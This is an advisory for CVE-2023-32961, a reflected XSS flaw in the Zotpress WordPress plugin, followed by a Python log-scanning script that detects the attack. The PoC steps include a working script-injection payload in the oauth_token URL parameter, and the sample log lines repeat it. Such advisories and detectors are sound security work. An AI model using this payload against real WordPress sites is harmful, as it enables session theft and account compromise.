CVE-2023-32961 Analysis

Component details

Component name


Vulnerable version

≤ 7.3.3

Component slug




Vulnerability details

Short description

The get_request_token function in zotpress/lib/admin/admin.accounts.oauth.php is vulnerable to an XSS attack via the oauth_token parameter.

How to reproduce (PoC)

  1. Install the PHP OAuth extension, which is required to trigger the vulnerability. (Zotpress treats this extension as optional.)
  2. Log in to
  3. The conditions for the get_request_token function to execute must be met (first time only). Send a request like this: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1
  4. Then send the payload below: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>

Additional information

  • You need an account.
  • You need to set the oauthState value to 1 to trigger it. If the above payload doesn’t work, you need to find a way to set oauthState to 1.
    • Conditional expression:

```php
$_GET['oauth_token'] != $state['request_token_info']['oauth_token']
```

  • Easy way to install the PHP OAuth extension:
    • One-line command:

```shell
sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
```

  • Tested on the wordpress:latest Docker image.
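As an added detection example (not part of this advisory or of Zotpress), the script below scans web-server access logs for requests to the vulnerable callback whose oauth_token value carries HTML metacharacters, which a genuine OAuth token never does; the log-line regex and the sample log entries are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter named in the advisory (CVE-2023-32961).
ZOTPRESS_OAUTH_PATH = "zotpress/lib/admin/admin.accounts.oauth.php"
PARAM = "oauth_token"
# A real OAuth token never contains HTML metacharacters; their presence in
# oauth_token marks the request as a reflected-XSS probe, not a valid callback.
SUSPICIOUS = re.compile(r'[<>"\']')

# Combined-format request line (assumption: the log keeps the full request
# target including the query string).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def suspicious_oauth_token(target):
    """Return the decoded oauth_token value if `target` hits the Zotpress
    OAuth callback with HTML metacharacters in the token, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.endswith(ZOTPRESS_OAUTH_PATH):
        return None  # other endpoints are out of scope for this rule
    # parse_qs percent-decodes values, so an encoded payload is seen as sent.
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        if SUSPICIOUS.search(value):
            return value
    return None

def scan_log(lines):
    """Return [(client_ip, decoded_token), ...] for every suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a parseable request line
        token = suspicious_oauth_token(m.group("target"))
        if token is not None:
            hits.append((m.group("client"), token))
    return hits

# Constructed sample log: the benign first-visit request from step 3 of the
# PoC, the XSS probe from step 4, and an unrelated request to another page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2023:12:00:00 +0000] "GET /wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jun/2023:12:00:05 +0000] "GET /wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jun/2023:12:01:00 +0000] "GET /wp-admin/admin.php?page=Zotpress&oauth_token=%3Cb%3E HTTP/1.1" 200 100',
]
```

Only the second sample line is reported: the first carries the plain token `1`, and the third targets a different endpoint, so neither matches the rule.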

PoC Video



This post is licensed under CC BY 4.0 by the author.